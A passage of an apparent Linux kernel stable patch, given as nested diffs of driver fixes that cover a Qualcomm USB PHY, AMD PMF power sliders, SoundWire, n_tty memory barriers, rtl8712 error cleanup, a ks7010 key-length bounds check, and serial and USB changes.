+ 	return 0;
+ 
+-disable_ahb_clk:
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
++disable_clks:
++	clk_bulk_disable_unprepare(hsphy->num_clks, hsphy->clks);
+ poweroff_phy:
+ 	regulator_bulk_disable(ARRAY_SIZE(hsphy->vregs), hsphy->vregs);
+ 
+@@ -461,7 +484,7 @@ static int qcom_snps_hsphy_exit(struct phy *phy)
+ 	struct qcom_snps_hsphy *hsphy = phy_get_drvdata(phy);
+ 
+ 	reset_control_assert(hsphy->phy_reset);
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
++	clk_bulk_disable_unprepare(hsphy->num_clks, hsphy->clks);
+ 	regulator_bulk_disable(ARRAY_SIZE(hsphy->vregs), hsphy->vregs);
+ 	hsphy->phy_initialized = false;
+ 
+@@ -554,14 +577,15 @@ static int qcom_snps_hsphy_probe(struct platform_device *pdev)
+ 	if (!hsphy)
+ 		return -ENOMEM;
+ 
++	hsphy->dev = dev;
++
+ 	hsphy->base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(hsphy->base))
+ 		return PTR_ERR(hsphy->base);
+ 
+-	hsphy->ref_clk = devm_clk_get(dev, "ref");
+-	if (IS_ERR(hsphy->ref_clk))
+-		return dev_err_probe(dev, PTR_ERR(hsphy->ref_clk),
+-				     "failed to get ref clk\n");
++	ret = qcom_snps_hsphy_clk_init(hsphy);
++	if (ret)
++		return dev_err_probe(dev, ret, "failed to initialize clocks\n");
+ 
+ 	hsphy->phy_reset = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+ 	if (IS_ERR(hsphy->phy_reset)) {
+diff --git a/drivers/platform/x86/amd/pmf/acpi.c b/drivers/platform/x86/amd/pmf/acpi.c
+index 081e84e116e79..3fc5e4547d9f2 100644
+--- a/drivers/platform/x86/amd/pmf/acpi.c
++++ b/drivers/platform/x86/amd/pmf/acpi.c
+@@ -106,6 +106,27 @@ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 									 data, sizeof(*data));
+ }
+ 
++int apmf_os_power_slider_update(struct amd_pmf_dev *pdev, u8 event)
++{
++	struct os_power_slider args;
++	struct acpi_buffer params;
++	union acpi_object *info;
++	int err = 0;
++
++	args.size = sizeof(args);
++	args.slider_event = event;
++
++	params.length = sizeof(args);
++	params.pointer = (void *)&args;
++
++	info = apmf_if_call(pdev, APMF_FUNC_OS_POWER_SLIDER_UPDATE, &params);
++	if (!info)
++		err = -EIO;
++
++	kfree(info);
++	return err;
++}
++
+ static void apmf_sbios_heartbeat_notify(struct work_struct *work)
+ {
+ 	struct amd_pmf_dev *dev = container_of(work, struct amd_pmf_dev, heart_beat.work);
+@@ -289,7 +310,7 @@ int apmf_acpi_init(struct amd_pmf_dev *pmf_dev)
+ 
+ 	ret = apmf_get_system_params(pmf_dev);
+ 	if (ret) {
+-		dev_err(pmf_dev->dev, "APMF apmf_get_system_params failed :%d\n", ret);
++		dev_dbg(pmf_dev->dev, "APMF apmf_get_system_params failed :%d\n", ret);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 73d2357e32f8e..8a38cd94a605d 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -71,7 +71,11 @@ static int amd_pmf_pwr_src_notify_call(struct notifier_block *nb, unsigned long
+ 			return NOTIFY_DONE;
+ 	}
+ 
+-	amd_pmf_set_sps_power_limits(pmf);
++	if (is_apmf_func_supported(pmf, APMF_FUNC_STATIC_SLIDER_GRANULAR))
++		amd_pmf_set_sps_power_limits(pmf);
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_OS_POWER_SLIDER_UPDATE))
++		amd_pmf_power_slider_update_event(pmf);
+ 
+ 	return NOTIFY_OK;
+ }
+@@ -295,7 +299,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 	int ret;
+ 
+ 	/* Enable Static Slider */
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR) ||
++	    is_apmf_func_supported(dev, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
+ 		amd_pmf_init_sps(dev);
+ 		dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
+ 		power_supply_reg_notifier(&dev->pwr_src_notifier);
+diff --git a/drivers/platform/x86/amd/pmf/pmf.h b/drivers/platform/x86/amd/pmf/pmf.h
+index 06c30cdc05733..deba88e6e4c8d 100644
+--- a/drivers/platform/x86/amd/pmf/pmf.h
++++ b/drivers/platform/x86/amd/pmf/pmf.h
+@@ -21,6 +21,7 @@
+ #define APMF_FUNC_SBIOS_HEARTBEAT			4
+ #define APMF_FUNC_AUTO_MODE					5
+ #define APMF_FUNC_SET_FAN_IDX				7
++#define APMF_FUNC_OS_POWER_SLIDER_UPDATE		8
+ #define APMF_FUNC_STATIC_SLIDER_GRANULAR       9
+ #define APMF_FUNC_DYN_SLIDER_AC				11
+ #define APMF_FUNC_DYN_SLIDER_DC				12
+@@ -44,6 +45,14 @@
+ #define GET_STT_LIMIT_APU	0x20
+ #define GET_STT_LIMIT_HS2	0x21
+ 
++/* OS slider update notification */
++#define DC_BEST_PERF		0
++#define DC_BETTER_PERF		1
++#define DC_BATTERY_SAVER	3
++#define AC_BEST_PERF		4
++#define AC_BETTER_PERF		5
++#define AC_BETTER_BATTERY	6
++
+ /* Fan Index for Auto Mode */
+ #define FAN_INDEX_AUTO		0xFFFFFFFF
+ 
+@@ -193,6 +202,11 @@ struct amd_pmf_static_slider_granular {
+ 	struct apmf_sps_prop_granular prop[POWER_SOURCE_MAX][POWER_MODE_MAX];
+ };
+ 
++struct os_power_slider {
++	u16 size;
++	u8 slider_event;
++} __packed;
++
+ struct fan_table_control {
+ 	bool manual;
+ 	unsigned long fan_id;
+@@ -383,6 +397,7 @@ int amd_pmf_send_cmd(struct amd_pmf_dev *dev, u8 message, bool get, u32 arg, u32
+ int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev);
+ int amd_pmf_get_power_source(void);
+ int apmf_install_handler(struct amd_pmf_dev *pmf_dev);
++int apmf_os_power_slider_update(struct amd_pmf_dev *dev, u8 flag);
+ 
+ /* SPS Layer */
+ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf);
+@@ -393,6 +408,7 @@ void amd_pmf_deinit_sps(struct amd_pmf_dev *dev);
+ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 				    struct apmf_static_slider_granular_output *output);
+ bool is_pprof_balanced(struct amd_pmf_dev *pmf);
++int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev);
+ 
+ 
+ int apmf_update_fan_idx(struct amd_pmf_dev *pdev, bool manual, u32 idx);
+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index bed762d47a14a..fd448844de206 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -119,14 +119,77 @@ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf)
+ 	return mode;
+ }
+ 
++int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev)
++{
++	u8 mode, flag = 0;
++	int src;
++
++	mode = amd_pmf_get_pprof_modes(dev);
++	if (mode < 0)
++		return mode;
++
++	src = amd_pmf_get_power_source();
++
++	if (src == POWER_SOURCE_AC) {
++		switch (mode) {
++		case POWER_MODE_PERFORMANCE:
++			flag |= BIT(AC_BEST_PERF);
++			break;
++		case POWER_MODE_BALANCED_POWER:
++			flag |= BIT(AC_BETTER_PERF);
++			break;
++		case POWER_MODE_POWER_SAVER:
++			flag |= BIT(AC_BETTER_BATTERY);
++			break;
++		default:
++			dev_err(dev->dev, "unsupported platform profile\n");
++			return -EOPNOTSUPP;
++		}
++
++	} else if (src == POWER_SOURCE_DC) {
++		switch (mode) {
++		case POWER_MODE_PERFORMANCE:
++			flag |= BIT(DC_BEST_PERF);
++			break;
++		case POWER_MODE_BALANCED_POWER:
++			flag |= BIT(DC_BETTER_PERF);
++			break;
++		case POWER_MODE_POWER_SAVER:
++			flag |= BIT(DC_BATTERY_SAVER);
++			break;
++		default:
++			dev_err(dev->dev, "unsupported platform profile\n");
++			return -EOPNOTSUPP;
++		}
++	}
++
++	apmf_os_power_slider_update(dev, flag);
++
++	return 0;
++}
++
+ static int amd_pmf_profile_set(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option profile)
+ {
+ 	struct amd_pmf_dev *pmf = container_of(pprof, struct amd_pmf_dev, pprof);
++	int ret = 0;
+ 
+ 	pmf->current_profile = profile;
+ 
+-	return amd_pmf_set_sps_power_limits(pmf);
++	/* Notify EC about the slider position change */
++	if (is_apmf_func_supported(pmf, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
++		ret = amd_pmf_power_slider_update_event(pmf);
++		if (ret)
++			return ret;
++	}
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		ret = amd_pmf_set_sps_power_limits(pmf);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
+ }
+ 
+ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+@@ -134,10 +197,13 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+ 	int err;
+ 
+ 	dev->current_profile = PLATFORM_PROFILE_BALANCED;
+-	amd_pmf_load_defaults_sps(dev);
+ 
+-	/* update SPS balanced power mode thermals */
+-	amd_pmf_set_sps_power_limits(dev);
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		amd_pmf_load_defaults_sps(dev);
++
++		/* update SPS balanced power mode thermals */
++		amd_pmf_set_sps_power_limits(dev);
++	}
+ 
+ 	dev->pprof.profile_get = amd_pmf_profile_get;
+ 	dev->pprof.profile_set = amd_pmf_profile_set;
+diff --git a/drivers/platform/x86/msi-laptop.c b/drivers/platform/x86/msi-laptop.c
+index 6b18ec543ac3a..f4c6c36e05a52 100644
+--- a/drivers/platform/x86/msi-laptop.c
++++ b/drivers/platform/x86/msi-laptop.c
+@@ -208,7 +208,7 @@ static ssize_t set_device_state(const char *buf, size_t count, u8 mask)
+ 		return -EINVAL;
+ 
+ 	if (quirks->ec_read_only)
+-		return -EOPNOTSUPP;
++		return 0;
+ 
+ 	/* read current device state */
+ 	result = ec_read(MSI_STANDARD_EC_COMMAND_ADDRESS, &rdata);
+@@ -838,15 +838,15 @@ static bool msi_laptop_i8042_filter(unsigned char data, unsigned char str,
+ static void msi_init_rfkill(struct work_struct *ignored)
+ {
+ 	if (rfk_wlan) {
+-		rfkill_set_sw_state(rfk_wlan, !wlan_s);
++		msi_rfkill_set_state(rfk_wlan, !wlan_s);
+ 		rfkill_wlan_set(NULL, !wlan_s);
+ 	}
+ 	if (rfk_bluetooth) {
+-		rfkill_set_sw_state(rfk_bluetooth, !bluetooth_s);
++		msi_rfkill_set_state(rfk_bluetooth, !bluetooth_s);
+ 		rfkill_bluetooth_set(NULL, !bluetooth_s);
+ 	}
+ 	if (rfk_threeg) {
+-		rfkill_set_sw_state(rfk_threeg, !threeg_s);
++		msi_rfkill_set_state(rfk_threeg, !threeg_s);
+ 		rfkill_threeg_set(NULL, !threeg_s);
+ 	}
+ }
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index 81d283b3cd3bd..d030fe2e29643 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -1050,7 +1050,7 @@ dasd_3990_erp_com_rej(struct dasd_ccw_req * erp, char *sense)
+ 		dev_err(&device->cdev->dev, "An I/O request was rejected"
+ 			" because writing is inhibited\n");
+ 		erp = dasd_3990_erp_cleanup(erp, DASD_CQR_FAILED);
+-	} else if (sense[7] & SNS7_INVALID_ON_SEC) {
++	} else if (sense[7] == SNS7_INVALID_ON_SEC) {
+ 		dev_err(&device->cdev->dev, "An I/O request was rejected on a copy pair secondary device\n");
+ 		/* suppress dump of sense data for this error */
+ 		set_bit(DASD_CQR_SUPPRESS_CR, &erp->refers->flags);
+diff --git a/drivers/s390/block/dasd_ioctl.c b/drivers/s390/block/dasd_ioctl.c
+index 8fca725b3daec..87890b6efcdcf 100644
+--- a/drivers/s390/block/dasd_ioctl.c
++++ b/drivers/s390/block/dasd_ioctl.c
+@@ -131,6 +131,7 @@ static int dasd_ioctl_resume(struct dasd_block *block)
+ 	spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 
+ 	dasd_schedule_block_bh(block);
++	dasd_schedule_device_bh(base);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/soundwire/bus.c b/drivers/soundwire/bus.c
+index 4fd221d0cc818..f7b3e6a6975b4 100644
+--- a/drivers/soundwire/bus.c
++++ b/drivers/soundwire/bus.c
+@@ -884,8 +884,8 @@ static void sdw_modify_slave_status(struct sdw_slave *slave,
+ 			"initializing enumeration and init completion for Slave %d\n",
+ 			slave->dev_num);
+ 
+-		init_completion(&slave->enumeration_complete);
+-		init_completion(&slave->initialization_complete);
++		reinit_completion(&slave->enumeration_complete);
++		reinit_completion(&slave->initialization_complete);
+ 
+ 	} else if ((status == SDW_SLAVE_ATTACHED) &&
+ 		   (slave->status == SDW_SLAVE_UNATTACHED)) {
+@@ -893,7 +893,7 @@ static void sdw_modify_slave_status(struct sdw_slave *slave,
+ 			"signaling enumeration completion for Slave %d\n",
+ 			slave->dev_num);
+ 
+-		complete(&slave->enumeration_complete);
++		complete_all(&slave->enumeration_complete);
+ 	}
+ 	slave->status = status;
+ 	mutex_unlock(&bus->bus_lock);
+@@ -1916,7 +1916,7 @@ int sdw_handle_slave_status(struct sdw_bus *bus,
+ 				"signaling initialization completion for Slave %d\n",
+ 				slave->dev_num);
+ 
+-			complete(&slave->initialization_complete);
++			complete_all(&slave->initialization_complete);
+ 
+ 			/*
+ 			 * If the manager became pm_runtime active, the peripherals will be
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 08934d27f709e..a51c8a670d38a 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -434,7 +434,7 @@ static int qcom_swrm_get_alert_slave_dev_num(struct qcom_swrm_ctrl *ctrl)
+ 		status = (val >> (dev_num * SWRM_MCP_SLV_STATUS_SZ));
+ 
+ 		if ((status & SWRM_MCP_SLV_STATUS_MASK) == SDW_SLAVE_ALERT) {
+-			ctrl->status[dev_num] = status;
++			ctrl->status[dev_num] = status & SWRM_MCP_SLV_STATUS_MASK;
+ 			return dev_num;
+ 		}
+ 	}
+diff --git a/drivers/staging/ks7010/ks_wlan_net.c b/drivers/staging/ks7010/ks_wlan_net.c
+index 7e8d37c169f0f..f389e227aefb9 100644
+--- a/drivers/staging/ks7010/ks_wlan_net.c
++++ b/drivers/staging/ks7010/ks_wlan_net.c
+@@ -1584,8 +1584,10 @@ static int ks_wlan_set_encode_ext(struct net_device *dev,
+ 			commit |= SME_WEP_FLAG;
+ 		}
+ 		if (enc->key_len) {
+-			memcpy(&key->key_val[0], &enc->key[0], enc->key_len);
+-			key->key_len = enc->key_len;
++			int key_len = clamp_val(enc->key_len, 0, IW_ENCODING_TOKEN_MAX);
++
++			memcpy(&key->key_val[0], &enc->key[0], key_len);
++			key->key_len = key_len;
+ 			commit |= (SME_WEP_VAL1 << index);
+ 		}
+ 		break;
+diff --git a/drivers/staging/media/atomisp/Kconfig b/drivers/staging/media/atomisp/Kconfig
+index 2c8d7fdcc5f7a..4881b6ea5237e 100644
+--- a/drivers/staging/media/atomisp/Kconfig
++++ b/drivers/staging/media/atomisp/Kconfig
+@@ -13,6 +13,7 @@ config VIDEO_ATOMISP
+ 	tristate "Intel Atom Image Signal Processor Driver"
+ 	depends on VIDEO_DEV && INTEL_ATOMISP
+ 	depends on PMIC_OPREGION
++	select V4L2_FWNODE
+ 	select IOSF_MBI
+ 	select VIDEOBUF_VMALLOC
+ 	select VIDEO_V4L2_SUBDEV_API
+diff --git a/drivers/staging/rtl8712/rtl871x_xmit.c b/drivers/staging/rtl8712/rtl871x_xmit.c
+index 090345bad2230..6353dbe554d3a 100644
+--- a/drivers/staging/rtl8712/rtl871x_xmit.c
++++ b/drivers/staging/rtl8712/rtl871x_xmit.c
+@@ -21,6 +21,7 @@
+ #include "osdep_intf.h"
+ #include "usb_ops.h"
+ 
++#include <linux/usb.h>
+ #include <linux/ieee80211.h>
+ 
+ static const u8 P802_1H_OUI[P80211_OUI_LEN] = {0x00, 0x00, 0xf8};
+@@ -55,6 +56,7 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	sint i;
+ 	struct xmit_buf *pxmitbuf;
+ 	struct xmit_frame *pxframe;
++	int j;
+ 
+ 	memset((unsigned char *)pxmitpriv, 0, sizeof(struct xmit_priv));
+ 	spin_lock_init(&pxmitpriv->lock);
+@@ -117,11 +119,8 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	_init_queue(&pxmitpriv->pending_xmitbuf_queue);
+ 	pxmitpriv->pallocated_xmitbuf =
+ 		kmalloc(NR_XMITBUFF * sizeof(struct xmit_buf) + 4, GFP_ATOMIC);
+-	if (!pxmitpriv->pallocated_xmitbuf) {
+-		kfree(pxmitpriv->pallocated_frame_buf);
+-		pxmitpriv->pallocated_frame_buf = NULL;
+-		return -ENOMEM;
+-	}
++	if (!pxmitpriv->pallocated_xmitbuf)
++		goto clean_up_frame_buf;
+ 	pxmitpriv->pxmitbuf = pxmitpriv->pallocated_xmitbuf + 4 -
+ 			      ((addr_t)(pxmitpriv->pallocated_xmitbuf) & 3);
+ 	pxmitbuf = (struct xmit_buf *)pxmitpriv->pxmitbuf;
+@@ -129,13 +128,17 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 		INIT_LIST_HEAD(&pxmitbuf->list);
+ 		pxmitbuf->pallocated_buf =
+ 			kmalloc(MAX_XMITBUF_SZ + XMITBUF_ALIGN_SZ, GFP_ATOMIC);
+-		if (!pxmitbuf->pallocated_buf)
+-			return -ENOMEM;
++		if (!pxmitbuf->pallocated_buf) {
++			j = 0;
++			goto clean_up_alloc_buf;
++		}
+ 		pxmitbuf->pbuf = pxmitbuf->pallocated_buf + XMITBUF_ALIGN_SZ -
+ 				 ((addr_t) (pxmitbuf->pallocated_buf) &
+ 				 (XMITBUF_ALIGN_SZ - 1));
+-		if (r8712_xmit_resource_alloc(padapter, pxmitbuf))
+-			return -ENOMEM;
++		if (r8712_xmit_resource_alloc(padapter, pxmitbuf)) {
++			j = 1;
++			goto clean_up_alloc_buf;
++		}
+ 		list_add_tail(&pxmitbuf->list,
+ 				 &(pxmitpriv->free_xmitbuf_queue.queue));
+ 		pxmitbuf++;
+@@ -146,6 +149,28 @@ int _r8712_init_xmit_priv(struct xmit_priv *pxmitpriv,
+ 	init_hwxmits(pxmitpriv->hwxmits, pxmitpriv->hwxmit_entry);
+ 	tasklet_setup(&pxmitpriv->xmit_tasklet, r8712_xmit_bh);
+ 	return 0;
++
++clean_up_alloc_buf:
++	if (j) {
++		/* failure happened in r8712_xmit_resource_alloc()
++		 * delete extra pxmitbuf->pallocated_buf
++		 */
++		kfree(pxmitbuf->pallocated_buf);
++	}
++	for (j = 0; j < i; j++) {
++		int k;
++
++		pxmitbuf--;			/* reset pointer */
++		kfree(pxmitbuf->pallocated_buf);
++		for (k = 0; k < 8; k++)		/* delete xmit urb's */
++			usb_free_urb(pxmitbuf->pxmit_urb[k]);
++	}
++	kfree(pxmitpriv->pallocated_xmitbuf);
++	pxmitpriv->pallocated_xmitbuf = NULL;
++clean_up_frame_buf:
++	kfree(pxmitpriv->pallocated_frame_buf);
++	pxmitpriv->pallocated_frame_buf = NULL;
++	return -ENOMEM;
+ }
+ 
+ void _free_xmit_priv(struct xmit_priv *pxmitpriv)
+diff --git a/drivers/staging/rtl8712/xmit_linux.c b/drivers/staging/rtl8712/xmit_linux.c
+index 132afbf49dde9..ceb6b590b310f 100644
+--- a/drivers/staging/rtl8712/xmit_linux.c
++++ b/drivers/staging/rtl8712/xmit_linux.c
+@@ -112,6 +112,12 @@ int r8712_xmit_resource_alloc(struct _adapter *padapter,
+ 	for (i = 0; i < 8; i++) {
+ 		pxmitbuf->pxmit_urb[i] = usb_alloc_urb(0, GFP_KERNEL);
+ 		if (!pxmitbuf->pxmit_urb[i]) {
++			int k;
++
++			for (k = i - 1; k >= 0; k--) {
++				/* handle allocation errors part way through loop */
++				usb_free_urb(pxmitbuf->pxmit_urb[k]);
++			}
+ 			netdev_err(padapter->pnetdev, "pxmitbuf->pxmit_urb[i] == NULL\n");
+ 			return -ENOMEM;
+ 		}
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index b6e0cc4571eac..59a559366b614 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2508,8 +2508,10 @@ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ 		gsm->has_devices = false;
+ 	}
+ 	for (i = NUM_DLCI - 1; i >= 0; i--)
+-		if (gsm->dlci[i])
++		if (gsm->dlci[i]) {
+ 			gsm_dlci_release(gsm->dlci[i]);
++			gsm->dlci[i] = NULL;
++		}
+ 	mutex_unlock(&gsm->mutex);
+ 	/* Now wipe the queues */
+ 	tty_ldisc_flush(gsm->tty);
+diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
+index 597019690ae62..4dff2f34e2d06 100644
+--- a/drivers/tty/n_tty.c
++++ b/drivers/tty/n_tty.c
+@@ -204,8 +204,8 @@ static void n_tty_kick_worker(struct tty_struct *tty)
+ 	struct n_tty_data *ldata = tty->disc_data;
+ 
+ 	/* Did the input worker stop? Restart it */
+-	if (unlikely(ldata->no_room)) {
+-		ldata->no_room = 0;
++	if (unlikely(READ_ONCE(ldata->no_room))) {
++		WRITE_ONCE(ldata->no_room, 0);
+ 
+ 		WARN_RATELIMIT(tty->port->itty == NULL,
+ 				"scheduling with invalid itty\n");
+@@ -1698,7 +1698,7 @@ n_tty_receive_buf_common(struct tty_struct *tty, const unsigned char *cp,
+ 			if (overflow && room < 0)
+ 				ldata->read_head--;
+ 			room = overflow;
+-			ldata->no_room = flow && !room;
++			WRITE_ONCE(ldata->no_room, flow && !room);
+ 		} else
+ 			overflow = 0;
+ 
+@@ -1729,6 +1729,17 @@ n_tty_receive_buf_common(struct tty_struct *tty, const unsigned char *cp,
+ 	} else
+ 		n_tty_check_throttle(tty);
+ 
++	if (unlikely(ldata->no_room)) {
++		/*
++		 * Barrier here is to ensure to read the latest read_tail in
++		 * chars_in_buffer() and to make sure that read_tail is not loaded
++		 * before ldata->no_room is set.
++		 */
++		smp_mb();
++		if (!chars_in_buffer(tty))
++			n_tty_kick_worker(tty);
++	}
++
+ 	up_read(&tty->termios_rwsem);
+ 
+ 	return rcvd;
+@@ -2130,7 +2141,7 @@ static ssize_t n_tty_read(struct tty_struct *tty, struct file *file,
+ 	ssize_t retval = 0;
+ 	long timeout;
+ 	bool packet;
+-	size_t tail;
++	size_t old_tail;
+ 
+ 	/*
+ 	 * Is this a continuation of a read started earler?
+@@ -2193,7 +2204,7 @@ static ssize_t n_tty_read(struct tty_struct *tty, struct file *file,
+ 	}
+ 
+ 	packet = tty->ctrl.packet;
+-	tail = ldata->read_tail;
++	old_tail = ldata->read_tail;
+ 
+ 	add_wait_queue(&tty->read_wait, &wait);
+ 	while (nr) {
+@@ -2282,8 +2293,14 @@ more_to_be_read:
+ 		if (time)
+ 			timeout = time;
+ 	}
+-	if (tail != ldata->read_tail)
++	if (old_tail != ldata->read_tail) {
++		/*
++		 * Make sure no_room is not read in n_tty_kick_worker()
++		 * before setting ldata->read_tail in copy_from_read_buf().
++		 */
++		smp_mb();
+ 		n_tty_kick_worker(tty);
++	}
+ 	up_read(&tty->termios_rwsem);
+ 
+ 	remove_wait_queue(&tty->read_wait, &wait);
+diff --git a/drivers/tty/serial/8250/8250_dwlib.c b/drivers/tty/serial/8250/8250_dwlib.c
+index 75f32f054ebb1..84843e204a5e8 100644
+--- a/drivers/tty/serial/8250/8250_dwlib.c
++++ b/drivers/tty/serial/8250/8250_dwlib.c
+@@ -244,7 +244,7 @@ void dw8250_setup_port(struct uart_port *p)
+ 	struct dw8250_port_data *pd = p->private_data;
+ 	struct dw8250_data *data = to_dw8250_data(pd);
+ 	struct uart_8250_port *up = up_to_u8250p(p);
+-	u32 reg;
++	u32 reg, old_dlf;
+ 
+ 	pd->hw_rs485_support = dw8250_detect_rs485_hw(p);
+ 	if (pd->hw_rs485_support) {
+@@ -270,9 +270,11 @@ void dw8250_setup_port(struct uart_port *p)
+ 	dev_dbg(p->dev, "Designware UART version %c.%c%c\n",
+ 		(reg >> 24) & 0xff, (reg >> 16) & 0xff, (reg >> 8) & 0xff);
+ 
++	/* Preserve value written by firmware or bootloader  */
++	old_dlf = dw8250_readl_ext(p, DW_UART_DLF);
+ 	dw8250_writel_ext(p, DW_UART_DLF, ~0U);
+ 	reg = dw8250_readl_ext(p, DW_UART_DLF);
+-	dw8250_writel_ext(p, DW_UART_DLF, 0);
++	dw8250_writel_ext(p, DW_UART_DLF, old_dlf);
+ 
+ 	if (reg) {
+ 		pd->dlf_size = fls(reg);
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index cf9dc2ddfe664..6f6c4e9b77435 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -1495,13 +1495,6 @@ static int qcom_geni_serial_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * Set pm_runtime status as ACTIVE so that wakeup_irq gets
+-	 * enabled/disabled from dev_pm_arm_wake_irq during system
+-	 * suspend/resume respectively.
+-	 */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	if (port->wakeup_irq > 0) {
+ 		device_init_wakeup(&pdev->dev, true);
+ 		ret = dev_pm_set_dedicated_wake_irq(&pdev->dev,
+diff --git a/drivers/tty/serial/sifive.c b/drivers/tty/serial/sifive.c
+index 7fb6760b5c37a..2affd1351ae73 100644
+--- a/drivers/tty/serial/sifive.c
++++ b/drivers/tty/serial/sifive.c
+@@ -832,7 +832,7 @@ static void sifive_serial_console_write(struct console *co, const char *s,
+ 	local_irq_restore(flags);
+ }
+ 
+-static int __init sifive_serial_console_setup(struct console *co, char *options)
++static int sifive_serial_console_setup(struct console *co, char *options)
+ {
+ 	struct sifive_serial_port *ssp;
+ 	int baud = SIFIVE_DEFAULT_BAUD_RATE;
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 1dcadef933e3a..69a44bd7e5d02 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -3012,12 +3012,14 @@ static int cdns3_gadget_udc_stop(struct usb_gadget *gadget)
+ static int cdns3_gadget_check_config(struct usb_gadget *gadget)
+ {
+ 	struct cdns3_device *priv_dev = gadget_to_cdns3_device(gadget);
++	struct cdns3_endpoint *priv_ep;
+ 	struct usb_ep *ep;
+ 	int n_in = 0;
+ 	int total;
+ 
+ 	list_for_each_entry(ep, &gadget->ep_list, ep_list) {
+-		if (ep->claimed && (ep->address & USB_DIR_IN))
++		priv_ep = ep_to_cdns3_ep(ep);
++		if ((priv_ep->flags & EP_CLAIMED) && (ep->address & USB_DIR_IN))
+ 			n_in++;
+ 	}
+ 
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 934b3d997702e..15e9bd180a1d2 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -436,6 +436,10 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	/* novation SoundControl XL */
+ 	{ USB_DEVICE(0x1235, 0x0061), .driver_info = USB_QUIRK_RESET_RESUME },
+ 
++	/* Focusrite Scarlett Solo USB */
++	{ USB_DEVICE(0x1235, 0x8211), .driver_info =
++			USB_QUIRK_DISCONNECT_SUSPEND },
++
+ 	/* Huawei 4G LTE module */
+ 	{ USB_DEVICE(0x12d1, 0x15bb), .driver_info =
+ 			USB_QUIRK_DISCONNECT_SUSPEND },
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index e999e6079ae03..3ee70ffaf0035 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -277,9 +277,9 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	/*
+ 	 * We're resetting only the device side because, if we're in host mode,
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+-	 * host-only mode, then we can return early.
++	 * host-only mode or current role is host, then we can return early.
+ 	 */
+-	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
++	if (dwc->dr_mode == USB_DR_MODE_HOST || dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -1241,22 +1241,6 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL1, reg);
+ 	}
+ 
+-	if (dwc->dr_mode == USB_DR_MODE_HOST ||
+-	    dwc->dr_mode == USB_DR_MODE_OTG) {
+-		reg = dwc3_readl(dwc->regs, DWC3_GUCTL);
+-
